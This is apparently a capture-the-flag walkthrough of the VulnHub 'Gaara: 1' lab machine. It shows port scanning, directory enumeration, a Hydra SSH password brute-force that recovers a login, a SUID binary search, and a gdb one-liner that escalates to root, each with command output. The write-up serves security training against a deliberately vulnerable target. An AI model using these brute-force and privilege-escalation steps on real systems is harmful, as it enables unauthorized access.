VulnHub: Gaara: 1

Today we will take a look at Vulnhub: Gaara: 1. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC --open 192.168.201.142PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster
gobuster dir -u http://192.168.201.142 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.201.142
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/01 10:59:28 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/server-status (Status: 403) [Size: 280]
/Cryoserver (Status: 200) [Size: 327]
  • Web

Url: http://192.168.201.142/Cryoserver

When I looked at all three, I could not find any useful information.

There was only text encrypted with base58. It was not useful to decode it either.

gaara:ismyname

Let’s attack ssh

  • Hydra

Command: hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.201.142:22

[DATA] attacking ssh://192.168.201.142:22/
[STATUS] 126.00 tries/min, 126 tries in 00:01h, 14344278 to do in 1897:24h, 16 active
[22][ssh] host: 192.168.201.142 login: gaara password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
  • Root

Command: find / -perm -u=s 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount

Command: gdb -nx -ex ‘python import os; os.setuid(0)’ -ex ‘!bash’ -ex quit

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store